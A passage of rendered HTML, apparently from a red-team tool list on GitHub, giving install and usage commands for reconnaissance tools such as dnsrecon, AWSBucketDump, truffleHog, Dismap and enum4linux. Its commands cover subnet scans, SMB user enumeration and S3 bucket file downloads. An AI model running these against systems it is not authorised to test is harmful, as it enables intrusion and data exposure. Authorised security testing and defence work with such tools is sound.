1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003ednsrecon is a Python tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install dnsrecon\"\u003e\u003cpre\u003esudo apt install dnsrecon\u003c/pre\u003e\u003c/div\u003e\n\u003cp 
dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"dnsrecon -d google.com\"\u003e\u003cpre\u003ednsrecon -d google.com\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/191689049-624db340-8adb-4a97-be8d-b7177f409a8b.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/191689049-624db340-8adb-4a97-be8d-b7177f409a8b.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://www.shodan.io/dashboard\" rel=\"nofollow\"\u003eshodan.io\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-shodanio\" class=\"anchor\" aria-label=\"Permalink: 🔙shodan.io\" href=\"#shodanio\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eShodan crawls public infrastructure and displays it in a searchable format. 
Using a company name, domain name or IP address, it is possible to discover potentially vulnerable systems relating to your target via shodan.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/D3Ext/AORT\"\u003eAORT\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-aort\" class=\"anchor\" aria-label=\"Permalink: 🔙AORT\" href=\"#aort\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative 
overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/D3Ext/AORT\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e AORT\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e pip3 install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-python notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"python3 AORT.py -d google.com\"\u003e\u003cpre\u003e\u003cspan class=\"pl-s1\"\u003epython3\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003eAORT\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003epy\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003e-\u003c/span\u003e\u003cspan class=\"pl-s1\"\u003ed\u003c/span\u003e \u003cspan class=\"pl-s1\"\u003egoogle\u003c/span\u003e.\u003cspan class=\"pl-c1\"\u003ecom\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/192070398-aae0217d-69c4-460b-ae4c-51b045551268.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/192070398-aae0217d-69c4-460b-ae4c-51b045551268.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/BishopFox/spoofcheck\"\u003espoofcheck\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-spoofcheck\" class=\"anchor\" aria-label=\"Permalink: 🔙spoofcheck\" href=\"#spoofcheck\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" 
width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally it will alert if the domain has DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDomains are spoofable if any of the following conditions are met:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eLack of an SPF or DMARC record\u003c/li\u003e\n\u003cli\u003eSPF record never specifies \u003ccode\u003e~all\u003c/code\u003e or \u003ccode\u003e-all\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDMARC policy is set to \u003ccode\u003ep=none\u003c/code\u003e or is nonexistent\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt\"\u003e\u003cpre\u003egit clone https://github.com/BishopFox/spoofcheck\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e \u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e spoofcheck\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e pip 
install -r requirements.txt\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"./spoofcheck.py [DOMAIN]\"\u003e\u003cpre\u003e./spoofcheck.py [DOMAIN]\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208209744-dfff6dd6-f53c-41a2-b3b7-bfc6bfb9b521.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208209744-dfff6dd6-f53c-41a2-b3b7-bfc6bfb9b521.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/jordanpotti/AWSBucketDump\"\u003eAWSBucketDump\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-awsbucketdump\" class=\"anchor\" aria-label=\"Permalink: 🔙AWSBucketDump\" href=\"#awsbucketdump\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eAWSBucketDump is a 
tool to quickly enumerate AWS S3 buckets to look for interesting files. It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]\n\noptional arguments:\n -h, --help show this help message and exit\n -D Download files. This requires significant diskspace\n -d If set to 1 or True, create directories for each host w/ results\n -t THREADS number of threads\n -l HOSTLIST\n -g GREPWORDS Provide a wordlist to grep for\n -m MAXSIZE Maximum file size to download.\n\n python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003eusage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE]\n\noptional arguments:\n -h, --help show this help message and exit\n -D Download files. 
This requires significant diskspace\n -d If set to 1 or True, create directories for each host w/ results\n -t THREADS number of threads\n -l HOSTLIST\n -g GREPWORDS Provide a wordlist to grep for\n -m MAXSIZE Maximum file size to download.\n\n python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/metac0rtex/GitHarvester\"\u003eGitHarvester\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-githarvester\" class=\"anchor\" aria-label=\"Permalink: 🔙GitHarvester\" href=\"#githarvester\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eNice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester\"\u003e\u003cpre 
class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"./githarvester.py\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003e./githarvester.py\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/dxa4481/truffleHog\"\u003etruffleHog\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-trufflehog\" class=\"anchor\" aria-label=\"Permalink: 🔙truffleHog\" href=\"#trufflehog\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. 
With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall (Binaries):\u003c/strong\u003e \u003ca href=\"https://github.com/trufflesecurity/trufflehog/releases\"\u003eLink\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall (Go):\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003egit clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"trufflehog https://github.com/trufflesecurity/test_keys\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003etrufflehog https://github.com/trufflesecurity/test_keys\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/208212273-137cb6ef-b0e6-42f7-8fd3-ac6a5cfe6a40.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/208212273-137cb6ef-b0e6-42f7-8fd3-ac6a5cfe6a40.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/zhzyker/dismap\"\u003eDismap\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-dismap\" 
class=\"anchor\" aria-label=\"Permalink: 🔙Dismap\" href=\"#dismap\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eDismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDismap is a binary file for Linux, MacOS, and Windows. 
Go to \u003ca href=\"https://github.com/zhzyker/dismap/releases\"\u003eRelease\u003c/a\u003e to download the corresponding version to run:\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Linux or MacOS\nchmod +x dismap-0.3-linux-amd64\n./dismap-0.3-linux-amd64 -h\n\n# Windows\ndismap-0.3-windows-amd64.exe -h\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Linux or MacOS\u003c/span\u003e\nchmod +x dismap-0.3-linux-amd64\n./dismap-0.3-linux-amd64 -h\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Windows\u003c/span\u003e\ndismap-0.3-windows-amd64.exe -h\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Scan 192.168.1.1 subnet\n./dismap -i 192.168.1.1/24\n\n# Scan, output to result.txt and json output to result.json\n./dismap -i 192.168.1.1/24 -o result.txt -j result.json\n\n# Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds\n./dismap -i 192.168.1.1/24 --np --timeout 10\n\n# Scan, Number of concurrent threads 1000\n./dismap -i 192.168.1.1/24 -t 1000\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Scan 192.168.1.1 subnet\u003c/span\u003e\n./dismap -i 192.168.1.1/24\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Scan, output to result.txt and json output to result.json\u003c/span\u003e\n./dismap -i 192.168.1.1/24 -o result.txt -j result.json\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds\u003c/span\u003e\n./dismap -i 192.168.1.1/24 --np 
--timeout 10\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Scan, Number of concurrent threads 1000\u003c/span\u003e\n./dismap -i 192.168.1.1/24 -t 1000\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210266012-ba3fadf8-5021-4690-a6d7-eda78bd5d50a.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210266012-ba3fadf8-5021-4690-a6d7-eda78bd5d50a.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/zhzyker/dismap\"\u003ehttps://github.com/zhzyker/dismap\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/CiscoCXSecurity/enum4linux\"\u003eenum4linux\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-enum4linux\" class=\"anchor\" aria-label=\"Permalink: 🔙enum4linux\" href=\"#enum4linux\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool for 
enumerating information from Windows and Samba systems.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt can be used to gather a wide range of information, including:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eDomain and domain controller information\u003c/li\u003e\n\u003cli\u003eLocal user and group information\u003c/li\u003e\n\u003cli\u003eShares and share permissions\u003c/li\u003e\n\u003cli\u003eSecurity policies\u003c/li\u003e\n\u003cli\u003eActive Directory information\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Apt)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"sudo apt install enum4linux\"\u003e\u003cpre\u003esudo apt install enum4linux\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Git)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/CiscoCXSecurity/enum4linux\ncd enum4linux\"\u003e\u003cpre\u003egit clone https://github.com/CiscoCXSecurity/enum4linux\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e enum4linux\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# 'Do everything'\nenum4linux.pl -a 192.168.2.55\n\n# Obtain list of usernames (RestrictAnonymous = 0)\nenum4linux.pl -U 192.168.2.55\n\n# Obtain list of usernames (using authentication)\nenum4linux.pl -u administrator -p password -U 192.168.2.55\n\n# Get a list of groups and their members\nenum4linux.pl -G 192.168.2.55\n\n# Verbose scan \nenum4linux.pl -v 192.168.2.55\"\u003e\u003cpre\u003e\u003cspan 
